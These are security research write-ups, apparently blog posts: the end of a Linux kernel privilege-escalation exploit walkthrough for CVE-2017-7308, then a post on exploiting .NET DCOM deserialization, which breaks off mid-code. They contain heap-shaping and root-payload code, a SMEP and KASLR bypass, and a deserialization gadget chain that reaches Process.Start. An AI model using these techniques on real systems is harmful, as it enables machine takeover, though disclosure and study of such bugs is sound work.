The Linux kernel has support for a few hardening features that make exploitation more difficult. KASLR (Kernel Address Space Layout Randomization) puts the kernel text at a random offset to make jumping to a particular fixed address useless. SMEP (Supervisor Mode Execution Protection) causes an oops whenever the kernel tries to execute code from the userspace memory and SMAP (Supervisor Mode Access Prevention) does the same whenever the kernel tries to access the userspace memory directly.
Shaping heap
The idea of the exploit is to use the heap out-of-bounds write to overwrite a function pointer in the memory adjacent to the overflown block. For that we need to specifically shape the heap, so some object with a triggerable function pointer is placed right after a ring buffer block. I chose the already mentioned packet_sock struct to be this object. We need to find a way to make the kernel allocate a ring buffer block and a packet_sock struct one next to the other.
As I mentioned above, ring buffer blocks are allocated with the kernel page allocator (the buddy allocator). It allows allocating blocks of 2^n contiguous memory pages. The allocator keeps a freelist of such blocks for each n and returns the freelist head when a block is requested. If the freelist for some n is empty, it finds the first m > n for which the freelist is not empty and splits blocks in halves until the required size is reached. Therefore, if we start repeatedly allocating blocks of size 2^n, at some point they will start coming from one high-order memory block being split, and each will be adjacent to the next.
A packet_sock is allocated via the kmalloc() function by the slab allocator. The slab allocator is mostly used to allocate objects of a smaller-than-one-page size. It uses the page allocator to allocate a big block of memory and splits this block into smaller objects. The big blocks are called slabs, hence the name of the allocator. A set of slabs together with their current state and a set of operations like “allocate an object” and “free an object” is called a cache. The slab allocator creates a set of general purpose caches for objects of size 2^n. Whenever kmalloc(size) is called, the slab allocator rounds size up to the nearest power of 2 and uses the cache of that size.
Since the kernel uses kmalloc() all the time, if we try to allocate an object it will most likely come from one of the slabs already created during previous usage. However, if we start allocating objects of the same size, at some point the slab allocator will run out of slabs for this size and will have to allocate another one via the page allocator.
The size of a newly allocated slab depends on the size of objects this slab is meant for. The size of the packet_sock struct is ~1920 bytes, and 1024 < 1920 <= 2048, which means that it’ll be rounded up to 2048 and the kmalloc-2048 cache will be used. It turns out that for this particular cache the SLUB allocator (the kind of slab allocator used in Ubuntu) uses slabs of size 0x8000. So whenever the allocator runs out of slabs for the kmalloc-2048 cache, it allocates 0x8000 bytes with the page allocator.
Keeping all that in mind, this is how we can allocate a kmalloc-2048 slab next to a ring buffer block:
  1. Allocate a lot (512 worked for me) of objects of size 2048 to fill currently existing slabs in the kmalloc-2048 cache. To do that we can create a bunch of packet sockets to cause allocation of packet_sock structs.
  2. Allocate a lot (1024 worked for me) of page blocks of size 0x8000 to drain the page allocator freelists and cause some high-order page block to be split. To do that we can create another packet socket and attach a ring buffer with 1024 blocks of size 0x8000.
  3. Create a packet socket and attach a ring buffer with blocks of size 0x8000. The last one of these blocks (I’m using 2 blocks, the reason is explained below) is the one we’re going to overflow.
  4. Create a bunch of packet sockets to allocate packet_sock structs and cause an allocation of at least one new slab.
This way we can shape the heap so that a fresh kmalloc-2048 slab, filled with packet_sock structs, lands right after the ring buffer block we are going to overflow. A code sketch of these steps follows below.
The exact number of allocations to drain freelists and shape the heap the way we want might be different for different setups and depend on the memory usage activity. The numbers above are for a mostly idle Ubuntu machine.
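Here is a sketch of these four shaping steps (the helper names are mine, not from the exploit; error handling omitted):

#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <string.h>

static int packet_sock(void) {
	int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
	int version = TPACKET_V3;
	setsockopt(fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
	return fd;
}

static void rx_ring(int fd, unsigned int block_size, unsigned int block_nr) {
	struct tpacket_req3 req;
	memset(&req, 0, sizeof(req));
	req.tp_block_size = block_size;
	req.tp_block_nr = block_nr;
	req.tp_frame_size = block_size;  /* one frame per block */
	req.tp_frame_nr = block_nr;
	req.tp_retire_blk_tov = 60;
	setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
}

void shape_heap(void) {
	int i, fd;
	/* 1. Fill existing kmalloc-2048 slabs with packet_sock objects. */
	for (i = 0; i < 512; i++)
		packet_sock();
	/* 2. Drain order-3 (0x8000-byte) blocks from the page allocator. */
	fd = packet_sock();
	rx_ring(fd, 0x8000, 1024);
	/* 3. The ring we will overflow: two 0x8000-byte blocks. */
	fd = packet_sock();
	rx_ring(fd, 0x8000, 2);
	/* 4. Force allocation of fresh kmalloc-2048 slabs right after it. */
	for (i = 0; i < 512; i++)
		packet_sock();
}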
Controlling the overwrite
Above I explained that the bug results in a write of a controlled maximum size at a controlled offset out of the bounds of a ring buffer block. It turns out that not only can we control the maximum size and offset, we can actually control the exact data (and its size) that’s being written. Since the data stored in a ring buffer block is the packet passing through a particular network interface, we can manually send packets with arbitrary content on a raw socket through the loopback interface. If we do that in an isolated network namespace, no external traffic will interfere.
There are a few caveats though.
First, it seems that the size of a packet must be at least 14 bytes (12 bytes for two mac addresses and 2 bytes for the EtherType apparently) for it to be passed to the packet socket layer. That means that we have to overwrite at least 14 bytes. The data in the packet itself can be arbitrary.
Then, the lowest 3 bits of nxt_offset always have the value of 2 due to the alignment. That means that we can’t start overwriting at an 8-byte aligned offset.
Besides that, when a packet is being received and saved into a block, the kernel updates some fields in the block and frame headers. If we point nxt_offset to some particular offset we want to overwrite, some data where the block and frames headers end up will probably be corrupted.
Another issue is that if we make nxt_offset point past the block end, the first block will be immediately closed when the first packet is being received, since the kernel will (correctly) decide that there’s no space left in the first block (see the __packet_lookup_frame_in_block() snippet). This is not really an issue, since we can create a ring buffer with 2 blocks. The first one will be closed, the second one will be overflown.
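With those caveats in mind, sending a fully controlled byte sequence into the ring can be sketched as follows (an illustrative sketch, not the exploit’s exact code; if_nametoindex resolves the loopback interface, and everything past the 14-byte Ethernet header is arbitrary):

#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <string.h>
#include <unistd.h>

void send_bytes(const void *data, size_t size) {
	int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

	struct sockaddr_ll addr;
	memset(&addr, 0, sizeof(addr));
	addr.sll_family = AF_PACKET;
	addr.sll_ifindex = if_nametoindex("lo");
	addr.sll_halen = ETH_ALEN;

	/* The buffer includes the Ethernet header, so size must be >= 14. */
	sendto(fd, data, size, 0, (struct sockaddr *)&addr, sizeof(addr));
	close(fd);
}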
Executing code
Now we need to figure out which function pointers to overwrite. There are a few function pointer fields in the packet_sock struct, but I ended up using the following two:
  1. packet_sock->xmit
  2. packet_sock->rx_ring->prb_bdqc->retire_blk_timer->func

The first one is called whenever a user tries to send a packet via a packet socket. The usual way to elevate privileges to root is to execute the commit_creds(prepare_kernel_cred(0)) payload in a process context. The xmit pointer is called from a process context, which means we can simply point it to the executable memory region, which contains the payload.
To do that we need to put our payload to some executable memory region. One of the possible ways for that is to put the payload in the userspace, either by mmapping an executable memory page or by just defining a global function within our exploit program. However, SMEP & SMAP will prevent the kernel from accessing and executing user memory directly, so we need to deal with them first.
For that I used the retire_blk_timer field (the same field used by Philip Pettersson in his CVE-2016-8655 exploit). It contains a function pointer that’s triggered whenever the retire timer times out. During normal packet socket operation, retire_blk_timer->func points to prb_retire_rx_blk_timer_expired() and it’s called with retire_blk_timer->data as an argument, which contains the address of the packet_sock struct. Since we can overwrite the data field along with the func field, we get a very nice func(data) primitive.
The state of SMEP & SMAP on the current CPU core is controlled by the 20th and 21st bits of the CR4 register. To disable them we should zero out these two bits. For this we can use the func(data) primitive to call native_write_cr4(X), where X has 20th and 21st bits set to 0. The exact value of X might depend on what other CPU features are enabled. On the machine where I tested the exploit, the value of CR4 is 0x10407f0 (only the SMEP bit is enabled since the CPU has no SMAP support), so I used X = 0x407f0. We can use the sched_setaffinity syscall to force the exploit program to be executed on one CPU core and thus making sure that the userspace payload will be executed on the same core as where we disable SMAP & SMEP.
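For completeness, the CPU pinning mentioned above is the standard sched_setaffinity pattern:

#define _GNU_SOURCE
#include <sched.h>

void pin_to_cpu0(void) {
	cpu_set_t set;
	CPU_ZERO(&set);
	CPU_SET(0, &set);
	sched_setaffinity(0, sizeof(set), &set); /* pid 0 = calling thread */
}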
Putting this all together, here are the exploitation steps:
  1. Figure out the kernel text address to bypass KASLR (described below).
  2. Pad heap as described above.
  3. Disable SMEP & SMAP.
    1. Allocate a packet_sock after a ring buffer block.
    2. Schedule a block retire timer on the packet_sock by attaching a receive ring buffer to it.
    3. Overflow the block and overwrite retire_blk_timer field. Make retire_blk_timer->func point to native_write_cr4 and make retire_blk_timer->data equal to the desired CR4 value.
    4. Wait for the timer to be executed, now we have SMEP & SMAP disabled on the current core.
  4. Get root privileges.
    1. Allocate another pair of a packet_sock and a ring buffer block.
    2. Overflow the block and overwrite xmit field. Make xmit point to a commit_creds(prepare_kernel_cred(0)) allocated in userspace.
    3. Send a packet on the corresponding packet socket, xmit will get triggered and the current process will obtain root privileges.

The exploit code can be found here.
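The userspace payload itself follows the classic pattern; here is a sketch, with placeholder offsets standing in for the real per-build symbol offsets (the function pointer typedefs are the usual exploit idiom, not the exact kernel prototypes):

typedef unsigned long (*prepare_kernel_cred_t)(unsigned long cred);
typedef unsigned long (*commit_creds_t)(unsigned long cred);

unsigned long kernel_text; /* recovered via the KASLR bypass below */

void get_root_payload(void) {
	/* The offsets below are placeholders; real values come from the
	   target kernel's System.map or /proc/kallsyms. */
	commit_creds_t commit_creds =
		(commit_creds_t)(kernel_text + 0xDEAD0 /* placeholder */);
	prepare_kernel_cred_t prepare_kernel_cred =
		(prepare_kernel_cred_t)(kernel_text + 0xBEEF0 /* placeholder */);
	commit_creds(prepare_kernel_cred(0));
}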
It should be noted that when we overwrite these two fields in the packet_sock structs, we’ll end up corrupting some of the fields before them (the kernel will write some values to the block and frame headers), which can lead to a kernel crash. However, as long as these other fields don’t get used by the kernel, we should be good. One of the fields that caused crashes when trying to close all packet sockets after the exploit finished is the mclist field, but simply zeroing it out helps.

KASLR bypass
I didn’t bother to come up with some elaborate KASLR bypass technique that exploits the same bug. Since Ubuntu doesn’t restrict dmesg by default, we can just grep the kernel syslog for the “Freeing SMP” string, which contains a kernel pointer that looks suspiciously similar to the kernel text address:
# Boot #1
$ dmesg | grep 'Freeing SMP'
[    0.012520] Freeing SMP alternatives memory: 32K (ffffffffa58ee000 - ffffffffa58f6000)
$ sudo cat /proc/kallsyms | grep 'T _text'
ffffffffa4800000 T _text

# Boot #2
$ dmesg | grep 'Freeing SMP'
[    0.017487] Freeing SMP alternatives memory: 32K (ffffffff85aee000 - ffffffff85af6000)
$ sudo cat /proc/kallsyms | grep 'T _text'
ffffffff84a00000 T _text
By doing simple math we can calculate the kernel text address based on the one exposed through dmesg: in both boots above the “Freeing SMP” address lies at the same fixed offset (0x10ee000) from _text. This way of figuring out the kernel text location works only for some time after boot, as syslog stores only a fixed number of lines and starts dropping them at some point.
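A sketch of automating this (the 0x10ee000 delta is derived from the two boots above and is specific to this kernel build):

#include <stdio.h>
#include <string.h>

unsigned long get_kernel_text(void) {
	FILE *f = popen("dmesg | grep 'Freeing SMP'", "r");
	char line[512];
	unsigned long addr = 0;
	if (f && fgets(line, sizeof(line), f)) {
		/* Parse the first address inside the parentheses, e.g.
		   "... 32K (ffffffffa58ee000 - ffffffffa58f6000)". */
		char *p = strchr(line, '(');
		if (p)
			sscanf(p + 1, "%lx", &addr);
	}
	if (f)
		pclose(f);
	return addr ? addr - 0x10ee000 : 0; /* build-specific offset */
}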
There are a few Linux kernel hardening features that can be used to prevent this kind of information disclosure. The first one is called dmesg_restrict, and it restricts the ability of unprivileged users to read the kernel syslog. It should be noted that even with dmesg restricted, the first user on Ubuntu can still read the syslog from /var/log/kern.log and /var/log/syslog, since they belong to the adm group.
Another feature is called kptr_restrict and it doesn’t allow unprivileged users to see pointers printed by the kernel with the %pK format specifier. However in 4.8 the free_reserved_area() function uses %p, so kptr_restrict doesn’t help in this case. In 4.10 free_reserved_area() was fixed not to print address ranges at all, but the change was not backported to older kernels.
Fix
Let’s take a look at the fix. The vulnerable code as it was before the fix is below. Remember that the user fully controls both tp_block_size and tp_sizeof_priv.
4207                 if (po->tp_version >= TPACKET_V3 &&
4208                     (int)(req->tp_block_size -
4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
4210                         goto out;
When thinking about a way to fix this, the first idea that comes to mind is that we can compare the two values as is without that weird conversion to int:
4207                 if (po->tp_version >= TPACKET_V3 &&
4208                     req->tp_block_size <=
4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv))
4210                         goto out;
Funny enough, this doesn’t actually help. The reason is that an overflow can happen while evaluating BLK_PLUS_PRIV in case tp_sizeof_priv is close to the unsigned int maximum value.
177 #define BLK_PLUS_PRIV(sz_of_priv) \
178         (BLK_HDR_LEN + ALIGN((sz_of_priv), V3_ALIGNMENT))
One of the ways to fix this overflow is to cast tp_sizeof_priv to uint64 before passing it to BLK_PLUS_PRIV. That’s exactly what I did in the fix that was sent upstream.
4207                 if (po->tp_version >= TPACKET_V3 &&
4208                     req->tp_block_size <=
4209                           BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv))
4210                         goto out;

Mitigation
Creating a packet socket requires the CAP_NET_RAW privilege, which can be acquired by an unprivileged user inside a user namespace. Unprivileged user namespaces expose a huge kernel attack surface, which has resulted in quite a few exploitable vulnerabilities (CVE-2017-7184, CVE-2016-8655, ...). Kernel vulnerabilities of this kind can be mitigated by completely disabling user namespaces or by disallowing their use by unprivileged users.
To disable user namespaces completely you can rebuild your kernel with CONFIG_USER_NS disabled. Restricting user namespace usage to privileged users can be done by writing 0 to /proc/sys/kernel/unprivileged_userns_clone on Debian-based kernels. Since version 4.9 the upstream kernel has a similar /proc/sys/user/max_user_namespaces setting.

Conclusion
Right now the Linux kernel has a huge number of poorly tested (from a security standpoint) interfaces and a lot of them are enabled and exposed to unprivileged users in popular Linux distributions like Ubuntu. This is obviously not good and they need to be tested or restricted.
Syzkaller is an amazing tool that allows testing kernel interfaces via fuzzing. Even adding barebones descriptions for another syscall usually uncovers a number of bugs. We certainly need people writing syscall descriptions and fixing existing ones, since there’s a huge surface that’s still not covered and probably a ton of security bugs buried in the kernel. If you decide to contribute, we’ll be glad to see a pull request.

Links
Just a bunch of related links.
Exploit: https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
Fix: https://github.com/torvalds/linux/commit/2b6867c2ce76c596676bec7d2d525af525fdc6e2
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7308
Our Linux kernel bug finding tools:
A collection of Linux kernel exploitation materials: https://github.com/xairy/linux-kernel-exploitation

Exploiting .NET Managed DCOM

Fri, 04/28/2017 - 12:23
Posted by James Forshaw, Project Zero
One of the more interesting classes of security vulnerabilities is those affecting interoperability technology. This is because these vulnerabilities typically affect any application using the technology, regardless of what the application actually does. Also, in many cases they’re difficult for a developer to mitigate outside of not using that technology, something which isn’t always possible.
I discovered one such vulnerability class in the Component Object Model (COM) interoperability layers of .NET which makes the use of .NET for Distributed COM (DCOM) across privilege boundaries inherently insecure. This blog post will describe a couple of ways this could be abused, first to gain elevated privileges and then as a remote code execution vulnerability.

A Little Bit of Background Knowledge

If you look at the history of .NET, many of its early underpinnings were about trying to make a better version of COM (for a quick history lesson it’s worth watching this short video of Anders Hejlsberg discussing .NET). This led to Microsoft placing a large focus on ensuring that while .NET itself might not be COM, it must be able to interoperate with COM. Therefore .NET can both be used to implement as well as consume COM objects. For example, instead of calling QueryInterface on a COM object you can just cast an object to a COM compatible interface. Implementing an out-of-process COM server in C# is as simple as the following:
// Define COM interface.
[ComVisible(true)]
[InterfaceType(ComInterfaceType.InterfaceIsIDispatch)]
[Guid("3D2392CB-2273-4A76-9C5D-B2C8A3120257")]
public interface ICustomInterface {
   void DoSomething();
}

// Define COM class implementing interface.
[ComVisible(true)]
[Guid("8BC3F05E-D86B-11D0-A075-00C04FB68820")]
public class COMObject : ICustomInterface {
   public void DoSomething() {}
}

// Register COM class with COM services.
RegistrationServices reg = new RegistrationServices();
int cookie = reg.RegisterTypeForComClients(
                 typeof(COMObject),
                 RegistrationClassContext.LocalServer
                   | RegistrationClassContext.RemoteServer,
                 RegistrationConnectionType.MultipleUse);
A client can now connect to the COM server using its CLSID (defined by the Guid attribute on COMObject). This is in fact so simple to do that a large number of core classes in .NET are marked as COM visible and registered for use by any COM client, even those not written in .NET.

To make this all work the .NET runtime hides a large amount of boilerplate from the developer. There are a couple of mechanisms to influence this boilerplate interoperability code, such as the InterfaceType attribute which defines whether the COM interface is derived from IUnknown or IDispatch but for the most part you get what you’re given.
One thing developers perhaps don’t realize is that it’s not just the interfaces you specify which get exported from the .NET COM object: the runtime adds a number of “management” interfaces as well. These interfaces are implemented by wrapping the .NET object inside a COM Callable Wrapper (CCW).
We can enumerate what interfaces are exposed by the CCW. Taking System.Object as an example the following table shows what interfaces are supported along with how each interface is implemented, either dynamically at runtime or statically implemented inside the runtime.
Interface Name               Implementation Type
_Object                      Dynamic
IConnectionPointContainer    Static
IDispatch                    Dynamic
IManagedObject               Static
IMarshal                     Static
IProvideClassInfo            Static
ISupportErrorInfo            Static
IUnknown                     Dynamic
The _Object interface refers to the COM visible representation of the System.Object class which is the root of all .NET objects, it must be generated dynamically as it’s dependent on the .NET object being exposed. On the other hand IManagedObject is implemented by the runtime itself and the implementation is shared across all CCWs.
I started looking at the exposed COM attack surface for .NET back in 2013 when I was investigating Internet Explorer sandbox escapes. One of the COM objects you could access outside the sandbox was the .NET ClickOnce Deployment broker (DFSVC) which turned out to be implemented in .NET, which is probably not too surprising. I actually found two issues, not in DFSVC itself but instead in the _Object interface exposed by all .NET COM objects. The _Object interface looks like the following (in C++).
struct _Object : public IDispatch {
 HRESULT ToString(BSTR * pRetVal);
 HRESULT Equals(VARIANT obj, VARIANT_BOOL *pRetVal);
 HRESULT GetHashCode(long *pRetVal);
 HRESULT GetType(_Type** pRetVal);
};
The first bug (which resulted in CVE-2014-0257) was in the GetType method. This method returns a COM object which can be used to access the .NET reflection APIs. As the returned _Type COM object was running inside the server you could call a chain of methods which resulted in getting access to the Process.Start method which you could call to escape the sandbox. If you want more details about that you can look at the PoC I wrote and put up on Github. Microsoft fixed this by preventing the access to the reflection APIs over DCOM.
The second issue was more subtle and is a byproduct of a feature of .NET interop which presumably no-one realized would be a security liability. Loading the .NET runtime requires quite a lot of additional resources, therefore the default for a native COM client calling methods on a .NET COM server is to let COM and the CCW manage the communication, even if this is a performance hit. Microsoft could have chosen to use the COM marshaler to force .NET to be loaded in the client but this seems overzealous, not even counting the possibility that the client might not even have a compatible version of .NET installed.
When .NET interops with a COM object it creates the inverse of the CCW, the Runtime Callable Wrapper (RCW). This is a .NET object which implements a runtime version of the COM interface and marshals it to the COM object. Now it’s entirely possible that the COM object is actually written in .NET, it might even be in the same Application Domain. If .NET didn’t do something you could end up with a double performance hit, marshaling in the RCW to call a COM object which is actually a CCW to a managed object.


It would be nice to try and “unwrap” the managed object from the CCW and get back a real .NET object. This is where the villain in this piece comes into play, the IManagedObject interface, which looks like the following:
struct IManagedObject : public IUnknown {
 HRESULT GetObjectIdentity(
   BSTR*   pBSTRGUID,  
   int*    AppDomainID,  
   int*    pCCW);
   
 HRESULT GetSerializedBuffer(
   BSTR *pBSTR  
 );
};
When the .NET runtime gets hold of a COM object it will go through a process to determine whether it can “unwrap” the object from its CCW and avoid creating an RCW. This process is documented but in summary the runtime will do the following:
  1. Call QueryInterface on the COM object to determine if it implements the IManagedObject interface. If not then return an appropriate RCW.
  2. Call GetObjectIdentity on the interface. If the GUID matches the per-runtime GUID (generated at runtime startup) and the AppDomain ID matches the current AppDomain ID then lookup the CCW value in a runtime table and extract a pointer to the real managed object and return it.
  3. Call GetSerializedBuffer on the interface. The runtime will check if the .NET object is serializable, if so it will pass the object to BinaryFormatter::Serialize and package the result in a Binary String (BSTR). This will be returned to the client which will now attempt to deserialize the buffer to an object instance by calling BinaryFormatter::Deserialize.

Both steps 2 and 3 sound like a bad idea. For example, while in step 2 the per-runtime GUID can’t be guessed, if you have access to any other object in the same process (such as the COM object exposed by the server itself) you can call GetObjectIdentity on that object and replay the GUID and AppDomain ID back to the server. This doesn’t really gain you much though: the CCW value is just a number, not a pointer, so at best you’ll be able to extract objects which already have a CCW in place.
Instead it’s step 3 which is really nasty. Arbitrary deserialization is dangerous almost no matter what language (take your pick: Java, PHP, Ruby, etc.) and .NET is no different. In fact my first ever Blackhat USA presentation (whitepaper) was on this very topic and there’s been follow-up work since (such as this blog post). Clearly this is an issue we can exploit; first let’s look at it from the perspective of privilege escalation.

Elevating Privileges

How can we get a COM server written in .NET to do the arbitrary deserialization? We need the server to try and create an RCW for a serializable .NET object exposed over COM. It would be nice if this could also be done generically; it just so happens that on the standard _Object interface there exists a function we can pass an arbitrary object to, the Equals method. The purpose of Equals is to compare two objects for equality. If we pass a .NET COM object to the server’s Equals method the runtime must try and convert it to an RCW so that the managed implementation can use it. At this point the runtime wants to be helpful and checks if it’s really a CCW-wrapped .NET object. The server runtime calls GetSerializedBuffer, which results in arbitrary deserialization in the server process.
This is how I exploited the ClickOnce Deployment broker a second time, resulting in CVE-2014-4073. The trick to exploiting this was to send a serialized Hashtable to the server which contains a COM implementation of the IHashCodeProvider interface. When the Hashtable runs its custom deserialization code it needs to rebuild its internal hash structures, it does that by calling IHashCodeProvider::GetHashCode on each key. By adding a Delegate object, which is serializable, as one of the keys we’ll get it passed back to the client. By writing the client in native code the automatic serialization through IManagedObject won’t occur when passing the delegate back to us. The delegate object gets stuck inside the server process but the CCW is exposed to us which we can call. Invoking the delegate results in the specified function being executed in the server context which allows us to start a new process with the server’s privileges. As this works generically I even wrote a tool to do it for any .NET COM server which you can find on github.

Microsoft could have fixed CVE-2014-4073 by changing the behavior of IManagedObject::GetSerializedBuffer, but they didn’t. Instead, Microsoft rewrote the broker in native code. Also a blog post was published warning developers of the dangers of .NET DCOM. However, what they didn’t do is deprecate any of the APIs to register DCOM objects in .NET, so unless a developer is particularly security savvy and happens to read a Microsoft security blog they probably don’t realize it’s a problem.
This bug class exists to this day. For example, when I recently received a new work laptop I did what I always do: enumerate what OEM “value add” software has been installed and see if anything is exploitable. It turns out that as part of the audio driver package was installed a COM service written by Dolby. After a couple of minutes of inspection, basically enumerating accessible interfaces for the COM server, I discovered it was written in .NET (the presence of IManagedObject is always a big giveaway). I cracked out my exploitation tool and in less than 5 minutes I had code execution at local system. This has now been fixed as CVE-2017-7293; you can find the very terse writeup here. Once again, as .NET DCOM is fundamentally unsafe, the only thing Dolby could do was rewrite the service in native code.

Hacking the Caller

Finding a new instance of the IManagedObject bug class focussed my mind on its other implications. The first thing to stress is that the server itself isn’t vulnerable; instead it’s only when we can force the server to act as a DCOM client calling back to the attacking application that the vulnerability can be exploited. Any .NET application which calls a DCOM object through managed COM interop should have a similar issue, not just servers. Is there likely to be any common use case for DCOM, especially in a modern Enterprise environment?
My immediate thought was Windows Management Instrumentation (WMI). Modern versions of Windows can connect to remote WMI instances using the WS-Management (WSMAN) protocol, but for legacy reasons WMI still supports a DCOM transport. One use case for WMI is to scan enterprise machines for potentially malicious behavior. One of the reasons for this resurgence is PowerShell (which is implemented in .NET) having easy-to-use support for WMI. Perhaps PS or .NET itself will be vulnerable to this attack if they try and access a compromised workstation on the network?

Looking at MSDN, .NET supports WMI through the System.Management namespace, which has existed since the beginning of .NET. It supports remote access to WMI, and considering the age of the classes it predates WSMAN and so almost certainly uses DCOM under the hood. On the PS front there’s support for WMI through cmdlets such as Get-WmiObject. PS version 3 (introduced in Windows 8 and Server 2012) added a new set of cmdlets including Get-CimInstance. Reading the related link it’s clear why the CIM cmdlets were introduced: support for WSMAN. The link explicitly points out that the “old” WMI cmdlets use DCOM.

At this point we could jump straight into reverse engineering the .NET and PS class libraries, but there’s an easier way: we should be able to see whether the .NET client queries for IManagedObject by observing the DCOM RPC traffic to a WMI server. Wireshark already has a DCOM dissector, saving us a lot of trouble. For a test I set up two VMs, one with Windows Server 2016 acting as a domain controller and one with Windows 10 as a client on the domain. Then from a Domain Administrator on the client I issued a simple WMI PS command ‘Get-WmiObject Win32_Process -ComputerName dc.network.local’ while monitoring the network using Wireshark. The following image shows what I observed:

The screenshot shows the initial creation request for the WMI DCOM object on the DC server (192.168.56.50) from the PS client (192.168.56.102). We can see it’s querying for the IWbemLoginClientID interface, which is part of the initialization process (as documented in MS-WMI). The client then tries to request a few other interfaces; notably it asks for IManagedObject. This almost certainly indicates that a client using the PS WMI cmdlets would be vulnerable.
In order to test whether this is really a vulnerability we’ll need a fake WMI server. This might seem like quite a challenge, but all we need to do is modify the registration for the winmgmt service to point to our fake implementation. As long as that service then registers a COM class with the CLSID {8BC3F05E-D86B-11D0-A075-00C04FB68820}, the COM activator will start the service and serve any client an instance of our fake WMI object. If we look back at our network capture it turns out that the query for IManagedObject isn’t occurring on the main class, but instead on the IWbemServices object returned from IWbemLevel1Login::NTLMLogin. But that’s okay, it just adds a bit of extra boilerplate code. To ensure it’s working we’ll implement the following code, which will tell the deserialization code to look for an unknown assembly called Badgers.
[Serializable, ComVisible(true)]
public class FakeWbemServices :
              IWbemServices,
              ISerializable {
   public void GetObjectData(SerializationInfo info,
                             StreamingContext context) {
       info.AssemblyName = "Badgers, Version=4.0.0.0";
       info.FullTypeName = "System.Badgers.Test";
   }
   
   // Rest of fake implementation...
}
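To actually get this class served to clients, something along the following lines should work once the winmgmt service registration points at our process (a hedged sketch: FakeWbemLevel1Login is a hypothetical class implementing IWbemLevel1Login whose NTLMLogin hands out the FakeWbemServices object):

// The well-known CLSID the WMI client activates.
Guid clsid = new Guid("8BC3F05E-D86B-11D0-A075-00C04FB68820");

// Expose our fake implementation to COM clients under that CLSID.
RegistrationServices reg = new RegistrationServices();
int cookie = reg.RegisterTypeForComClients(
    typeof(FakeWbemLevel1Login), ref clsid);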
If we successfully inject a serialized stream then we’d expect the PS process to try and look up a Badgers.dll file, and using Process Monitor that’s exactly what we find.
Chaining Up the Deserializer
When exploiting the deserialization for local privilege escalation we can be sure that we can connect back to the server and run an arbitrary delegate. We don’t have any such guarantees in the RCE case. If the WMI client has default Windows Firewall rules enabled then we almost certainly wouldn’t be able to connect to the RPC endpoint created by the delegate object. We also need to be allowed to log in over the network to the machine running the WMI client; our compromised machine might not have a login to the domain, or the enterprise policy might block anyone but the owner from logging in to the client machine.
We therefore need a slightly different plan: instead of actively attacking the client by exposing a new delegate object, we’ll instead pass it a byte stream which, when deserialized, executes a desired action. In an ideal world we’d find that one serializable class which just executes arbitrary code for us. Sadly (as far as I know) no such class exists. So instead we’ll need to find a series of “gadget” classes which, when chained together, perform the desired effect.
In this situation I tend to write some quick analysis tools. .NET supports a pretty good reflection API, so finding basic information such as whether a class is serializable or which interfaces a class supports is easy to do. We also need a list of assemblies to check; the quickest way I know of is to use the gacutil utility installed as part of the .NET SDK (and so installed with Visual Studio). Run the command gacutil /l > assemblies.txt to create a list of assembly names you can load and process. For a first pass we’ll look for any classes which are serializable and have delegates in them; these might be classes which, when an operation is performed, will execute arbitrary code. With our list of assemblies we can write some simple code like the following to find those classes, calling FindSerializableTypes for each assembly name string:
static bool IsDelegateType(Type t) {
 return typeof(Delegate).IsAssignableFrom(t);
}

static bool HasSerializedDelegate(Type t) {
 // Custom serialized objects rarely serialize their delegates.
 if (typeof(ISerializable).IsAssignableFrom(t)) {
   return false;
 }

 foreach (FieldInfo field in FormatterServices.GetSerializableMembers(t)) {
   if (IsDelegateType(field.FieldType)) {
     return true;
   }
 }

 return false;
}

static void FindSerializableTypes(string assembly_name) {
 Assembly asm = Assembly.Load(assembly_name);
 var types = asm.GetTypes().Where(t =>  t.IsSerializable
                                     && t.IsClass
                                     && !t.IsAbstract
                                     && !IsDelegateType(t)
                                     && HasSerializedDelegate(t));
 foreach (Type type in types) {
   Console.WriteLine(type.FullName);
 }
}
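A minimal driver for the scan might look like this, assuming gacutil’s output was saved to assemblies.txt as described above:

foreach (string line in File.ReadAllLines("assemblies.txt")) {
 // gacutil /l indents each entry and prints summary lines; only
 // process lines which look like assembly names.
 string name = line.Trim();
 if (name.Length == 0 || !name.Contains("Version="))
   continue;
 try {
   FindSerializableTypes(name);
 } catch (Exception) {
   // Some GAC assemblies fail to load or reflect; skip them.
 }
}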
Across my system this analysis resulted in only around 20 classes, and many of those were actually in the F# libraries, which are not distributed in a default installation. However one class did catch my eye, System.Collections.Generic.ComparisonComparer&lt;T&gt;. You can find the implementation in the reference source, but as it’s so simple here it is in its entirety:
public delegate int Comparison<T>(T x, T y);
[Serializable]
internal class ComparisonComparer<T> : Comparer<T> {
 private readonly Comparison<T> _comparison;

 public ComparisonComparer(Comparison<T> comparison) {
   _comparison = comparison;
 }

 public override int Compare(T x, T y) {
   return this._comparison(x, y);
 }
}
This class wraps a Comparison&lt;T&gt; delegate, which takes two generic parameters (of the same type) and returns an integer, calling the delegate to implement the IComparer&lt;T&gt; interface. While the class is internal, its creation is exposed through the Comparer&lt;T&gt;::Create static method. This is the first part of the chain: with this class and a bit of massaging of serialized delegates we can chain IComparer&lt;T&gt;::Compare to Process::Start and get an arbitrary process created. Now we need the next part of the chain: calling this comparer object with arbitrary arguments.
Comparer objects are used a lot in the generic .NET collection classes, and many of these collection classes also have custom deserialization code. In this case we can abuse the SortedSet&lt;T&gt; class: on deserialization it rebuilds its set using an internal comparer object to determine the sort order. The values passed to the comparer are the entries in the set, which are under our complete control. Let’s write some test code to check it works as we expect:
static void TypeConfuseDelegate(Comparison<string> comp) {
   FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList",
           BindingFlags.NonPublic | BindingFlags.Instance);
   object[] invoke_list = comp.GetInvocationList();
   // Modify the invocation list to add Process::Start(string, string)
   invoke_list[1] = new Func<string, string, Process>(Process.Start);
   fi.SetValue(comp, invoke_list);
}

